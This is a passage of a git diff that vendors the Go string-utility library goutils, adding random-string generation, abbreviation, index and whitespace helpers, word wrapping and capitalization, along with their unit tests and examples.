+ error - an error stemming from an invalid parameter within underlying function, RandomSeed(...)
+*/
+func RandomAscii(count int) (string, error) {
+ return Random(count, 32, 127, false, false)
+}
+
+/*
+RandomNumeric creates a random string whose length is the number of characters specified.
+Characters will be chosen from the set of numeric characters.
+
+Parameter:
+ count - the length of random string to create
+
+Returns:
+ string - the random string
+ error - an error stemming from an invalid parameter within underlying function, RandomSeed(...)
+*/
+func RandomNumeric(count int) (string, error) {
+ return Random(count, 0, 0, false, true)
+}
+
+/*
+RandomAlphabetic creates a random string whose length is the number of characters specified.
+Characters will be chosen from the set of alpha-numeric characters as indicated by the arguments.
+
+Parameters:
+ count - the length of random string to create
+ letters - if true, generated string may include alphabetic characters
+ numbers - if true, generated string may include numeric characters
+
+Returns:
+ string - the random string
+ error - an error stemming from an invalid parameter within underlying function, RandomSeed(...)
+*/
+func RandomAlphabetic(count int) (string, error) {
+ return Random(count, 0, 0, true, false)
+}
+
+/*
+RandomAlphaNumeric creates a random string whose length is the number of characters specified.
+Characters will be chosen from the set of alpha-numeric characters.
+
+Parameter:
+ count - the length of random string to create
+
+Returns:
+ string - the random string
+ error - an error stemming from an invalid parameter within underlying function, RandomSeed(...)
+*/
+func RandomAlphaNumeric(count int) (string, error) {
+ RandomString, err := Random(count, 0, 0, true, true)
+ if err != nil {
+ return "", fmt.Errorf("Error: %s", err)
+ }
+ match, err := regexp.MatchString("([0-9]+)", RandomString)
+ if err != nil {
+ panic(err)
+ }
+
+ if !match {
+ //Get the position between 0 and the length of the string-1 to insert a random number
+ position := rand.Intn(count)
+ //Insert a random number between [0-9] in the position
+ RandomString = RandomString[:position] + string('0'+rand.Intn(10)) + RandomString[position+1:]
+ return RandomString, err
+ }
+ return RandomString, err
+
+}
+
+/*
+RandomAlphaNumericCustom creates a random string whose length is the number of characters specified.
+Characters will be chosen from the set of alpha-numeric characters as indicated by the arguments.
+
+Parameters:
+ count - the length of random string to create
+ letters - if true, generated string may include alphabetic characters
+ numbers - if true, generated string may include numeric characters
+
+Returns:
+ string - the random string
+ error - an error stemming from an invalid parameter within underlying function, RandomSeed(...)
+*/
+func RandomAlphaNumericCustom(count int, letters bool, numbers bool) (string, error) {
+ return Random(count, 0, 0, letters, numbers)
+}
+
+/*
+Random creates a random string based on a variety of options, using default source of randomness.
+This method has exactly the same semantics as RandomSeed(int, int, int, bool, bool, []char, *rand.Rand), but
+instead of using an externally supplied source of randomness, it uses the internal *rand.Rand instance.
+
+Parameters:
+ count - the length of random string to create
+ start - the position in set of chars (ASCII/Unicode int) to start at
+ end - the position in set of chars (ASCII/Unicode int) to end before
+ letters - if true, generated string may include alphabetic characters
+ numbers - if true, generated string may include numeric characters
+ chars - the set of chars to choose randoms from. If nil, then it will use the set of all chars.
+
+Returns:
+ string - the random string
+ error - an error stemming from an invalid parameter within underlying function, RandomSeed(...)
+*/
+func Random(count int, start int, end int, letters bool, numbers bool, chars ...rune) (string, error) {
+ return RandomSeed(count, start, end, letters, numbers, chars, RANDOM)
+}
+
+/*
+RandomSeed creates a random string based on a variety of options, using supplied source of randomness.
+If the parameters start and end are both 0, start and end are set to ' ' and 'z', the ASCII printable characters, will be used,
+unless letters and numbers are both false, in which case, start and end are set to 0 and math.MaxInt32, respectively.
+If chars is not nil, characters stored in chars that are between start and end are chosen.
+This method accepts a user-supplied *rand.Rand instance to use as a source of randomness. By seeding a single *rand.Rand instance
+with a fixed seed and using it for each call, the same random sequence of strings can be generated repeatedly and predictably.
+
+Parameters:
+ count - the length of random string to create
+ start - the position in set of chars (ASCII/Unicode decimals) to start at
+ end - the position in set of chars (ASCII/Unicode decimals) to end before
+ letters - if true, generated string may include alphabetic characters
+ numbers - if true, generated string may include numeric characters
+ chars - the set of chars to choose randoms from. If nil, then it will use the set of all chars.
+ random - a source of randomness.
+
+Returns:
+ string - the random string
+ error - an error stemming from invalid parameters: if count < 0; or the provided chars array is empty; or end <= start; or end > len(chars)
+*/
+func RandomSeed(count int, start int, end int, letters bool, numbers bool, chars []rune, random *rand.Rand) (string, error) {
+
+ if count == 0 {
+ return "", nil
+ } else if count < 0 {
+ err := fmt.Errorf("randomstringutils illegal argument: Requested random string length %v is less than 0.", count) // equiv to err := errors.New("...")
+ return "", err
+ }
+ if chars != nil && len(chars) == 0 {
+ err := fmt.Errorf("randomstringutils illegal argument: The chars array must not be empty")
+ return "", err
+ }
+
+ if start == 0 && end == 0 {
+ if chars != nil {
+ end = len(chars)
+ } else {
+ if !letters && !numbers {
+ end = math.MaxInt32
+ } else {
+ end = 'z' + 1
+ start = ' '
+ }
+ }
+ } else {
+ if end <= start {
+ err := fmt.Errorf("randomstringutils illegal argument: Parameter end (%v) must be greater than start (%v)", end, start)
+ return "", err
+ }
+
+ if chars != nil && end > len(chars) {
+ err := fmt.Errorf("randomstringutils illegal argument: Parameter end (%v) cannot be greater than len(chars) (%v)", end, len(chars))
+ return "", err
+ }
+ }
+
+ buffer := make([]rune, count)
+ gap := end - start
+
+ // high-surrogates range, (\uD800-\uDBFF) = 55296 - 56319
+ // low-surrogates range, (\uDC00-\uDFFF) = 56320 - 57343
+
+ for count != 0 {
+ count--
+ var ch rune
+ if chars == nil {
+ ch = rune(random.Intn(gap) + start)
+ } else {
+ ch = chars[random.Intn(gap)+start]
+ }
+
+ if letters && unicode.IsLetter(ch) || numbers && unicode.IsDigit(ch) || !letters && !numbers {
+ if ch >= 56320 && ch <= 57343 { // low surrogate range
+ if count == 0 {
+ count++
+ } else {
+ // Insert low surrogate
+ buffer[count] = ch
+ count--
+ // Insert high surrogate
+ buffer[count] = rune(55296 + random.Intn(128))
+ }
+ } else if ch >= 55296 && ch <= 56191 { // High surrogates range (Partial)
+ if count == 0 {
+ count++
+ } else {
+ // Insert low surrogate
+ buffer[count] = rune(56320 + random.Intn(128))
+ count--
+ // Insert high surrogate
+ buffer[count] = ch
+ }
+ } else if ch >= 56192 && ch <= 56319 {
+ // private high surrogate, skip it
+ count++
+ } else {
+ // not one of the surrogates*
+ buffer[count] = ch
+ }
+ } else {
+ count++
+ }
+ }
+ return string(buffer), nil
+}
diff --git a/vendor/github.com/aokoli/goutils/randomstringutils_test.go b/vendor/github.com/aokoli/goutils/randomstringutils_test.go
new file mode 100644
index 0000000000..b990654a1c
--- /dev/null
+++ b/vendor/github.com/aokoli/goutils/randomstringutils_test.go
@@ -0,0 +1,78 @@
+package goutils
+
+import (
+ "fmt"
+ "math/rand"
+ "testing"
+)
+
+// ****************************** TESTS ********************************************
+
+func TestRandomSeed(t *testing.T) {
+
+ // count, start, end, letters, numbers := 5, 0, 0, true, true
+ random := rand.New(rand.NewSource(10))
+ out := "3ip9v"
+
+ // Test 1: Simulating RandomAlphaNumeric(count int)
+ if x, _ := RandomSeed(5, 0, 0, true, true, nil, random); x != out {
+ t.Errorf("RandomSeed(%v, %v, %v, %v, %v, %v, %v) = %v, want %v", 5, 0, 0, true, true, nil, random, x, out)
+ }
+
+ // Test 2: Simulating RandomAlphabetic(count int)
+ out = "MBrbj"
+
+ if x, _ := RandomSeed(5, 0, 0, true, false, nil, random); x != out {
+ t.Errorf("RandomSeed(%v, %v, %v, %v, %v, %v, %v) = %v, want %v", 5, 0, 0, true, false, nil, random, x, out)
+ }
+
+ // Test 3: Simulating RandomNumeric(count int)
+ out = "88935"
+
+ if x, _ := RandomSeed(5, 0, 0, false, true, nil, random); x != out {
+ t.Errorf("RandomSeed(%v, %v, %v, %v, %v, %v, %v) = %v, want %v", 5, 0, 0, false, true, nil, random, x, out)
+ }
+
+ // Test 4: Simulating RandomAscii(count int)
+ out = "H_I;E"
+
+ if x, _ := RandomSeed(5, 32, 127, false, false, nil, random); x != out {
+ t.Errorf("RandomSeed(%v, %v, %v, %v, %v, %v, %v) = %v, want %v", 5, 32, 127, false, false, nil, random, x, out)
+ }
+
+ // Test 5: Simulating RandomSeed(...) with custom chars
+ chars := []rune{'1', '2', '3', 'a', 'b', 'c'}
+ out = "2b2ca"
+
+ if x, _ := RandomSeed(5, 0, 0, false, false, chars, random); x != out {
+ t.Errorf("RandomSeed(%v, %v, %v, %v, %v, %v, %v) = %v, want %v", 5, 0, 0, false, false, chars, random, x, out)
+ }
+
+}
+
+// ****************************** EXAMPLES ********************************************
+
+func ExampleRandomSeed() {
+
+ var seed int64 = 10 // If you change this seed #, the random sequence below will change
+ random := rand.New(rand.NewSource(seed))
+ chars := []rune{'1', '2', '3', 'a', 'b', 'c'}
+
+ rand1, _ := RandomSeed(5, 0, 0, true, true, nil, random) // RandomAlphaNumeric (Alphabets and numbers possible)
+ rand2, _ := RandomSeed(5, 0, 0, true, false, nil, random) // RandomAlphabetic (Only alphabets)
+ rand3, _ := RandomSeed(5, 0, 0, false, true, nil, random) // RandomNumeric (Only numbers)
+ rand4, _ := RandomSeed(5, 32, 127, false, false, nil, random) // RandomAscii (Alphabets, numbers, and other ASCII chars)
+ rand5, _ := RandomSeed(5, 0, 0, true, true, chars, random) // RandomSeed with custom characters
+
+ fmt.Println(rand1)
+ fmt.Println(rand2)
+ fmt.Println(rand3)
+ fmt.Println(rand4)
+ fmt.Println(rand5)
+ // Output:
+ // 3ip9v
+ // MBrbj
+ // 88935
+ // H_I;E
+ // 2b2ca
+}
diff --git a/vendor/github.com/aokoli/goutils/stringutils.go b/vendor/github.com/aokoli/goutils/stringutils.go
new file mode 100644
index 0000000000..5037c4516b
--- /dev/null
+++ b/vendor/github.com/aokoli/goutils/stringutils.go
@@ -0,0 +1,224 @@
+/*
+Copyright 2014 Alexander Okoli
+
+Licensed under the Apache License, Version 2.0 (the "License");
+you may not use this file except in compliance with the License.
+You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+Unless required by applicable law or agreed to in writing, software
+distributed under the License is distributed on an "AS IS" BASIS,
+WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+See the License for the specific language governing permissions and
+limitations under the License.
+*/
+
+package goutils
+
+import (
+ "bytes"
+ "fmt"
+ "strings"
+ "unicode"
+)
+
+// Typically returned by functions where a searched item cannot be found
+const INDEX_NOT_FOUND = -1
+
+/*
+Abbreviate abbreviates a string using ellipses. This will turn the string "Now is the time for all good men" into "Now is the time for..."
+
+Specifically, the algorithm is as follows:
+
+ - If str is less than maxWidth characters long, return it.
+ - Else abbreviate it to (str[0:maxWidth - 3] + "...").
+ - If maxWidth is less than 4, return an illegal argument error.
+ - In no case will it return a string of length greater than maxWidth.
+
+Parameters:
+ str - the string to check
+ maxWidth - maximum length of result string, must be at least 4
+
+Returns:
+ string - abbreviated string
+ error - if the width is too small
+*/
+func Abbreviate(str string, maxWidth int) (string, error) {
+ return AbbreviateFull(str, 0, maxWidth)
+}
+
+/*
+AbbreviateFull abbreviates a string using ellipses. This will turn the string "Now is the time for all good men" into "...is the time for..."
+This function works like Abbreviate(string, int), but allows you to specify a "left edge" offset. Note that this left edge is not
+necessarily going to be the leftmost character in the result, or the first character following the ellipses, but it will appear
+somewhere in the result.
+In no case will it return a string of length greater than maxWidth.
+
+Parameters:
+ str - the string to check
+ offset - left edge of source string
+ maxWidth - maximum length of result string, must be at least 4
+
+Returns:
+ string - abbreviated string
+ error - if the width is too small
+*/
+func AbbreviateFull(str string, offset int, maxWidth int) (string, error) {
+ if str == "" {
+ return "", nil
+ }
+ if maxWidth < 4 {
+ err := fmt.Errorf("stringutils illegal argument: Minimum abbreviation width is 4")
+ return "", err
+ }
+ if len(str) <= maxWidth {
+ return str, nil
+ }
+ if offset > len(str) {
+ offset = len(str)
+ }
+ if len(str)-offset < (maxWidth - 3) { // 15 - 5 < 10 - 3 = 10 < 7
+ offset = len(str) - (maxWidth - 3)
+ }
+ abrevMarker := "..."
+ if offset <= 4 {
+ return str[0:maxWidth-3] + abrevMarker, nil // str.substring(0, maxWidth - 3) + abrevMarker;
+ }
+ if maxWidth < 7 {
+ err := fmt.Errorf("stringutils illegal argument: Minimum abbreviation width with offset is 7")
+ return "", err
+ }
+ if (offset + maxWidth - 3) < len(str) { // 5 + (10-3) < 15 = 12 < 15
+ abrevStr, _ := Abbreviate(str[offset:len(str)], (maxWidth - 3))
+ return abrevMarker + abrevStr, nil // abrevMarker + abbreviate(str.substring(offset), maxWidth - 3);
+ }
+ return abrevMarker + str[(len(str)-(maxWidth-3)):len(str)], nil // abrevMarker + str.substring(str.length() - (maxWidth - 3));
+}
+
+/*
+DeleteWhiteSpace deletes all whitespaces from a string as defined by unicode.IsSpace(rune).
+It returns the string without whitespaces.
+
+Parameter:
+ str - the string to delete whitespace from, may be nil
+
+Returns:
+ the string without whitespaces
+*/
+func DeleteWhiteSpace(str string) string {
+ if str == "" {
+ return str
+ }
+ sz := len(str)
+ var chs bytes.Buffer
+ count := 0
+ for i := 0; i < sz; i++ {
+ ch := rune(str[i])
+ if !unicode.IsSpace(ch) {
+ chs.WriteRune(ch)
+ count++
+ }
+ }
+ if count == sz {
+ return str
+ }
+ return chs.String()
+}
+
+/*
+IndexOfDifference compares two strings, and returns the index at which the strings begin to differ.
+
+Parameters:
+ str1 - the first string
+ str2 - the second string
+
+Returns:
+ the index where str1 and str2 begin to differ; -1 if they are equal
+*/
+func IndexOfDifference(str1 string, str2 string) int {
+ if str1 == str2 {
+ return INDEX_NOT_FOUND
+ }
+ if IsEmpty(str1) || IsEmpty(str2) {
+ return 0
+ }
+ var i int
+ for i = 0; i < len(str1) && i < len(str2); i++ {
+ if rune(str1[i]) != rune(str2[i]) {
+ break
+ }
+ }
+ if i < len(str2) || i < len(str1) {
+ return i
+ }
+ return INDEX_NOT_FOUND
+}
+
+/*
+IsBlank checks if a string is whitespace or empty (""). Observe the following behavior:
+
+ goutils.IsBlank("") = true
+ goutils.IsBlank(" ") = true
+ goutils.IsBlank("bob") = false
+ goutils.IsBlank(" bob ") = false
+
+Parameter:
+ str - the string to check
+
+Returns:
+ true - if the string is whitespace or empty ("")
+*/
+func IsBlank(str string) bool {
+ strLen := len(str)
+ if str == "" || strLen == 0 {
+ return true
+ }
+ for i := 0; i < strLen; i++ {
+ if unicode.IsSpace(rune(str[i])) == false {
+ return false
+ }
+ }
+ return true
+}
+
+/*
+IndexOf returns the index of the first instance of sub in str, with the search beginning from the
+index start point specified. -1 is returned if sub is not present in str.
+
+An empty string ("") will return -1 (INDEX_NOT_FOUND). A negative start position is treated as zero.
+A start position greater than the string length returns -1.
+
+Parameters:
+ str - the string to check
+ sub - the substring to find
+ start - the start position; negative treated as zero
+
+Returns:
+ the first index where the sub string was found (always >= start)
+*/
+func IndexOf(str string, sub string, start int) int {
+
+ if start < 0 {
+ start = 0
+ }
+
+ if len(str) < start {
+ return INDEX_NOT_FOUND
+ }
+
+ if IsEmpty(str) || IsEmpty(sub) {
+ return INDEX_NOT_FOUND
+ }
+
+ partialIndex := strings.Index(str[start:len(str)], sub)
+ if partialIndex == -1 {
+ return INDEX_NOT_FOUND
+ }
+ return partialIndex + start
+}
+
+// IsEmpty checks if a string is empty (""). Returns true if empty, and false otherwise.
+func IsEmpty(str string) bool {
+ return len(str) == 0
+}
diff --git a/vendor/github.com/aokoli/goutils/stringutils_test.go b/vendor/github.com/aokoli/goutils/stringutils_test.go
new file mode 100644
index 0000000000..dae93132a0
--- /dev/null
+++ b/vendor/github.com/aokoli/goutils/stringutils_test.go
@@ -0,0 +1,309 @@
+package goutils
+
+import (
+ "fmt"
+ "testing"
+)
+
+// ****************************** TESTS ********************************************
+
+func TestAbbreviate(t *testing.T) {
+
+ // Test 1
+ in := "abcdefg"
+ out := "abc..."
+ maxWidth := 6
+
+ if x, _ := Abbreviate(in, maxWidth); x != out {
+ t.Errorf("Abbreviate(%v, %v) = %v, want %v", in, maxWidth, x, out)
+ }
+
+ // Test 2
+ out = "abcdefg"
+ maxWidth = 7
+
+ if x, _ := Abbreviate(in, maxWidth); x != out {
+ t.Errorf("Abbreviate(%v, %v) = %v, want %v", in, maxWidth, x, out)
+ }
+
+ // Test 3
+ out = "a..."
+ maxWidth = 4
+
+ if x, _ := Abbreviate(in, maxWidth); x != out {
+ t.Errorf("Abbreviate(%v, %v) = %v, want %v", in, maxWidth, x, out)
+ }
+}
+
+func TestAbbreviateFull(t *testing.T) {
+
+ // Test 1
+ in := "abcdefghijklmno"
+ out := "abcdefg..."
+ offset := -1
+ maxWidth := 10
+
+ if x, _ := AbbreviateFull(in, offset, maxWidth); x != out {
+ t.Errorf("AbbreviateFull(%v, %v, %v) = %v, want %v", in, offset, maxWidth, x, out)
+ }
+
+ // Test 2
+ out = "...fghi..."
+ offset = 5
+ maxWidth = 10
+
+ if x, _ := AbbreviateFull(in, offset, maxWidth); x != out {
+ t.Errorf("AbbreviateFull(%v, %v, %v) = %v, want %v", in, offset, maxWidth, x, out)
+ }
+
+ // Test 3
+ out = "...ijklmno"
+ offset = 12
+ maxWidth = 10
+
+ if x, _ := AbbreviateFull(in, offset, maxWidth); x != out {
+ t.Errorf("AbbreviateFull(%v, %v, %v) = %v, want %v", in, offset, maxWidth, x, out)
+ }
+}
+
+func TestIndexOf(t *testing.T) {
+
+ // Test 1
+ str := "abcafgka"
+ sub := "a"
+ start := 0
+ out := 0
+
+ if x := IndexOf(str, sub, start); x != out {
+ t.Errorf("IndexOf(%v, %v, %v) = %v, want %v", str, sub, start, x, out)
+ }
+
+ // Test 2
+ start = 1
+ out = 3
+
+ if x := IndexOf(str, sub, start); x != out {
+ t.Errorf("IndexOf(%v, %v, %v) = %v, want %v", str, sub, start, x, out)
+ }
+
+ // Test 3
+ start = 4
+ out = 7
+
+ if x := IndexOf(str, sub, start); x != out {
+ t.Errorf("IndexOf(%v, %v, %v) = %v, want %v", str, sub, start, x, out)
+ }
+
+ // Test 4
+ sub = "z"
+ out = -1
+
+ if x := IndexOf(str, sub, start); x != out {
+ t.Errorf("IndexOf(%v, %v, %v) = %v, want %v", str, sub, start, x, out)
+ }
+
+}
+
+func TestIsBlank(t *testing.T) {
+
+ // Test 1
+ str := ""
+ out := true
+
+ if x := IsBlank(str); x != out {
+ t.Errorf("IndexOf(%v) = %v, want %v", str, x, out)
+ }
+
+ // Test 2
+ str = " "
+ out = true
+
+ if x := IsBlank(str); x != out {
+ t.Errorf("IndexOf(%v) = %v, want %v", str, x, out)
+ }
+
+ // Test 3
+ str = " abc "
+ out = false
+
+ if x := IsBlank(str); x != out {
+ t.Errorf("IndexOf(%v) = %v, want %v", str, x, out)
+ }
+}
+
+func TestDeleteWhiteSpace(t *testing.T) {
+
+ // Test 1
+ str := " a b c "
+ out := "abc"
+
+ if x := DeleteWhiteSpace(str); x != out {
+ t.Errorf("IndexOf(%v) = %v, want %v", str, x, out)
+ }
+
+ // Test 2
+ str = " "
+ out = ""
+
+ if x := DeleteWhiteSpace(str); x != out {
+ t.Errorf("IndexOf(%v) = %v, want %v", str, x, out)
+ }
+}
+
+func TestIndexOfDifference(t *testing.T) {
+
+ str1 := "abc"
+ str2 := "a_c"
+ out := 1
+
+ if x := IndexOfDifference(str1, str2); x != out {
+ t.Errorf("IndexOfDifference(%v, %v) = %v, want %v", str1, str2, x, out)
+ }
+}
+
+// ****************************** EXAMPLES ********************************************
+
+func ExampleAbbreviate() {
+
+ str := "abcdefg"
+ out1, _ := Abbreviate(str, 6)
+ out2, _ := Abbreviate(str, 7)
+ out3, _ := Abbreviate(str, 8)
+ out4, _ := Abbreviate(str, 4)
+ _, err1 := Abbreviate(str, 3)
+
+ fmt.Println(out1)
+ fmt.Println(out2)
+ fmt.Println(out3)
+ fmt.Println(out4)
+ fmt.Println(err1)
+ // Output:
+ // abc...
+ // abcdefg
+ // abcdefg
+ // a...
+ // stringutils illegal argument: Minimum abbreviation width is 4
+}
+
+func ExampleAbbreviateFull() {
+
+ str := "abcdefghijklmno"
+ str2 := "abcdefghij"
+ out1, _ := AbbreviateFull(str, -1, 10)
+ out2, _ := AbbreviateFull(str, 0, 10)
+ out3, _ := AbbreviateFull(str, 1, 10)
+ out4, _ := AbbreviateFull(str, 4, 10)
+ out5, _ := AbbreviateFull(str, 5, 10)
+ out6, _ := AbbreviateFull(str, 6, 10)
+ out7, _ := AbbreviateFull(str, 8, 10)
+ out8, _ := AbbreviateFull(str, 10, 10)
+ out9, _ := AbbreviateFull(str, 12, 10)
+ _, err1 := AbbreviateFull(str2, 0, 3)
+ _, err2 := AbbreviateFull(str2, 5, 6)
+
+ fmt.Println(out1)
+ fmt.Println(out2)
+ fmt.Println(out3)
+ fmt.Println(out4)
+ fmt.Println(out5)
+ fmt.Println(out6)
+ fmt.Println(out7)
+ fmt.Println(out8)
+ fmt.Println(out9)
+ fmt.Println(err1)
+ fmt.Println(err2)
+ // Output:
+ // abcdefg...
+ // abcdefg...
+ // abcdefg...
+ // abcdefg...
+ // ...fghi...
+ // ...ghij...
+ // ...ijklmno
+ // ...ijklmno
+ // ...ijklmno
+ // stringutils illegal argument: Minimum abbreviation width is 4
+ // stringutils illegal argument: Minimum abbreviation width with offset is 7
+}
+
+func ExampleIsBlank() {
+
+ out1 := IsBlank("")
+ out2 := IsBlank(" ")
+ out3 := IsBlank("bob")
+ out4 := IsBlank(" bob ")
+
+ fmt.Println(out1)
+ fmt.Println(out2)
+ fmt.Println(out3)
+ fmt.Println(out4)
+ // Output:
+ // true
+ // true
+ // false
+ // false
+}
+
+func ExampleDeleteWhiteSpace() {
+
+ out1 := DeleteWhiteSpace(" ")
+ out2 := DeleteWhiteSpace("bob")
+ out3 := DeleteWhiteSpace("bob ")
+ out4 := DeleteWhiteSpace(" b o b ")
+
+ fmt.Println(out1)
+ fmt.Println(out2)
+ fmt.Println(out3)
+ fmt.Println(out4)
+ // Output:
+ //
+ // bob
+ // bob
+ // bob
+}
+
+func ExampleIndexOf() {
+
+ str := "abcdefgehije"
+ out1 := IndexOf(str, "e", 0)
+ out2 := IndexOf(str, "e", 5)
+ out3 := IndexOf(str, "e", 8)
+ out4 := IndexOf(str, "eh", 0)
+ out5 := IndexOf(str, "eh", 22)
+ out6 := IndexOf(str, "z", 0)
+ out7 := IndexOf(str, "", 0)
+
+ fmt.Println(out1)
+ fmt.Println(out2)
+ fmt.Println(out3)
+ fmt.Println(out4)
+ fmt.Println(out5)
+ fmt.Println(out6)
+ fmt.Println(out7)
+ // Output:
+ // 4
+ // 7
+ // 11
+ // 7
+ // -1
+ // -1
+ // -1
+}
+
+func ExampleIndexOfDifference() {
+
+ out1 := IndexOfDifference("abc", "abc")
+ out2 := IndexOfDifference("ab", "abxyz")
+ out3 := IndexOfDifference("", "abc")
+ out4 := IndexOfDifference("abcde", "abxyz")
+
+ fmt.Println(out1)
+ fmt.Println(out2)
+ fmt.Println(out3)
+ fmt.Println(out4)
+ // Output:
+ // -1
+ // 2
+ // 0
+ // 2
+}
diff --git a/vendor/github.com/aokoli/goutils/wordutils.go b/vendor/github.com/aokoli/goutils/wordutils.go
new file mode 100644
index 0000000000..e92dd39900
--- /dev/null
+++ b/vendor/github.com/aokoli/goutils/wordutils.go
@@ -0,0 +1,356 @@
+/*
+Copyright 2014 Alexander Okoli
+
+Licensed under the Apache License, Version 2.0 (the "License");
+you may not use this file except in compliance with the License.
+You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+Unless required by applicable law or agreed to in writing, software
+distributed under the License is distributed on an "AS IS" BASIS,
+WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+See the License for the specific language governing permissions and
+limitations under the License.
+*/
+
+/*
+Package goutils provides utility functions to manipulate strings in various ways.
+The code snippets below show examples of how to use goutils. Some functions return
+errors while others do not, so usage would vary as a result.
+
+Example:
+
+ package main
+
+ import (
+ "fmt"
+ "github.com/aokoli/goutils"
+ )
+
+ func main() {
+
+ // EXAMPLE 1: A goutils function which returns no errors
+ fmt.Println (goutils.Initials("John Doe Foo")) // Prints out "JDF"
+
+
+
+ // EXAMPLE 2: A goutils function which returns an error
+ rand1, err1 := goutils.Random (-1, 0, 0, true, true)
+
+ if err1 != nil {
+ fmt.Println(err1) // Prints out error message because -1 was entered as the first parameter in goutils.Random(...)
+ } else {
+ fmt.Println(rand1)
+ }
+ }
+*/
+package goutils
+
+import (
+ "bytes"
+ "strings"
+ "unicode"
+)
+
+// VERSION indicates the current version of goutils
+const VERSION = "1.0.0"
+
+/*
+Wrap wraps a single line of text, identifying words by ' '.
+New lines will be separated by '\n'. Very long words, such as URLs will not be wrapped.
+Leading spaces on a new line are stripped. Trailing spaces are not stripped.
+
+Parameters:
+ str - the string to be word wrapped
+ wrapLength - the column (a column can fit only one character) to wrap the words at, less than 1 is treated as 1
+
+Returns:
+ a line with newlines inserted
+*/
+func Wrap(str string, wrapLength int) string {
+ return WrapCustom(str, wrapLength, "", false)
+}
+
+/*
+WrapCustom wraps a single line of text, identifying words by ' '.
+Leading spaces on a new line are stripped. Trailing spaces are not stripped.
+
+Parameters:
+ str - the string to be word wrapped
+ wrapLength - the column number (a column can fit only one character) to wrap the words at, less than 1 is treated as 1
+ newLineStr - the string to insert for a new line, "" uses '\n'
+ wrapLongWords - true if long words (such as URLs) should be wrapped
+
+Returns:
+ a line with newlines inserted
+*/
+func WrapCustom(str string, wrapLength int, newLineStr string, wrapLongWords bool) string {
+
+ if str == "" {
+ return ""
+ }
+ if newLineStr == "" {
+ newLineStr = "\n" // TODO Assumes "\n" is seperator. Explore SystemUtils.LINE_SEPARATOR from Apache Commons
+ }
+ if wrapLength < 1 {
+ wrapLength = 1
+ }
+
+ inputLineLength := len(str)
+ offset := 0
+
+ var wrappedLine bytes.Buffer
+
+ for inputLineLength-offset > wrapLength {
+
+ if rune(str[offset]) == ' ' {
+ offset++
+ continue
+ }
+
+ end := wrapLength + offset + 1
+ spaceToWrapAt := strings.LastIndex(str[offset:end], " ") + offset
+
+ if spaceToWrapAt >= offset {
+ // normal word (not longer than wrapLength)
+ wrappedLine.WriteString(str[offset:spaceToWrapAt])
+ wrappedLine.WriteString(newLineStr)
+ offset = spaceToWrapAt + 1
+
+ } else {
+ // long word or URL
+ if wrapLongWords {
+ end := wrapLength + offset
+ // long words are wrapped one line at a time
+ wrappedLine.WriteString(str[offset:end])
+ wrappedLine.WriteString(newLineStr)
+ offset += wrapLength
+ } else {
+ // long words aren't wrapped, just extended beyond limit
+ end := wrapLength + offset
+ spaceToWrapAt = strings.IndexRune(str[end:len(str)], ' ') + end
+ if spaceToWrapAt >= 0 {
+ wrappedLine.WriteString(str[offset:spaceToWrapAt])
+ wrappedLine.WriteString(newLineStr)
+ offset = spaceToWrapAt + 1
+ } else {
+ wrappedLine.WriteString(str[offset:len(str)])
+ offset = inputLineLength
+ }
+ }
+ }
+ }
+
+ wrappedLine.WriteString(str[offset:len(str)])
+
+ return wrappedLine.String()
+
+}
+
+/*
+Capitalize capitalizes all the delimiter separated words in a string. Only the first letter of each word is changed.
+To convert the rest of each word to lowercase at the same time, use CapitalizeFully(str string, delimiters ...rune).
+The delimiters represent a set of characters understood to separate words. The first string character
+and the first non-delimiter character after a delimiter will be capitalized. A "" input string returns "".
+Capitalization uses the Unicode title case, normally equivalent to upper case.
+
+Parameters:
+ str - the string to capitalize
+ delimiters - set of characters to determine capitalization, exclusion of this parameter means whitespace would be delimeter
+
+Returns:
+ capitalized string
+*/
+func Capitalize(str string, delimiters ...rune) string {
+
+ var delimLen int
+
+ if delimiters == nil {
+ delimLen = -1
+ } else {
+ delimLen = len(delimiters)
+ }
+
+ if str == "" || delimLen == 0 {
+ return str
+ }
+
+ buffer := []rune(str)
+ capitalizeNext := true
+ for i := 0; i < len(buffer); i++ {
+ ch := buffer[i]
+ if isDelimiter(ch, delimiters...) {
+ capitalizeNext = true
+ } else if capitalizeNext {
+ buffer[i] = unicode.ToTitle(ch)
+ capitalizeNext = false
+ }
+ }
+ return string(buffer)
+
+}
+
+/*
+CapitalizeFully converts all the delimiter separated words in a string into capitalized words, that is each word is made up of a
+titlecase character and then a series of lowercase characters. The delimiters represent a set of characters understood
+to separate words. The first string character and the first non-delimiter character after a delimiter will be capitalized.
+Capitalization uses the Unicode title case, normally equivalent to upper case.
+
+Parameters:
+ str - the string to capitalize fully
+ delimiters - set of characters to determine capitalization, exclusion of this parameter means whitespace would be delimeter
+
+Returns:
+ capitalized string
+*/
+func CapitalizeFully(str string, delimiters ...rune) string {
+
+ var delimLen int
+
+ if delimiters == nil {
+ delimLen = -1
+ } else {
+ delimLen = len(delimiters)
+ }
+
+ if str == "" || delimLen == 0 {
+ return str
+ }
+ str = strings.ToLower(str)
+ return Capitalize(str, delimiters...)
+}
+
+/*
+Uncapitalize uncapitalizes all the whitespace separated words in a string. Only the first letter of each word is changed.
+The delimiters represent a set of characters understood to separate words. The first string character and the first non-delimiter
+character after a delimiter will be uncapitalized. Whitespace is defined by unicode.IsSpace(char).
+
+Parameters:
+ str - the string to uncapitalize fully
+ delimiters - set of characters to determine capitalization, exclusion of this parameter means whitespace would be delimeter
+
+Returns:
+ uncapitalized string
+*/
+func Uncapitalize(str string, delimiters ...rune) string {
+
+ var delimLen int
+
+ if delimiters == nil {
+ delimLen = -1
+ } else {
+ delimLen = len(delimiters)
+ }
+
+ if str == "" || delimLen == 0 {
+ return str
+ }
+
+ buffer := []rune(str)
+ uncapitalizeNext := true // TODO Always makes capitalize/un apply to first char.
+ for i := 0; i < len(buffer); i++ {
+ ch := buffer[i]
+ if isDelimiter(ch, delimiters...) {
+ uncapitalizeNext = true
+ } else if uncapitalizeNext {
+ buffer[i] = unicode.ToLower(ch)
+ uncapitalizeNext = false
+ }
+ }
+ return string(buffer)
+}
+
+/*
+SwapCase swaps the case of a string using a word based algorithm.
+
+Conversion algorithm:
+
+ Upper case character converts to Lower case
+ Title case character converts to Lower case
+ Lower case character after Whitespace or at start converts to Title case
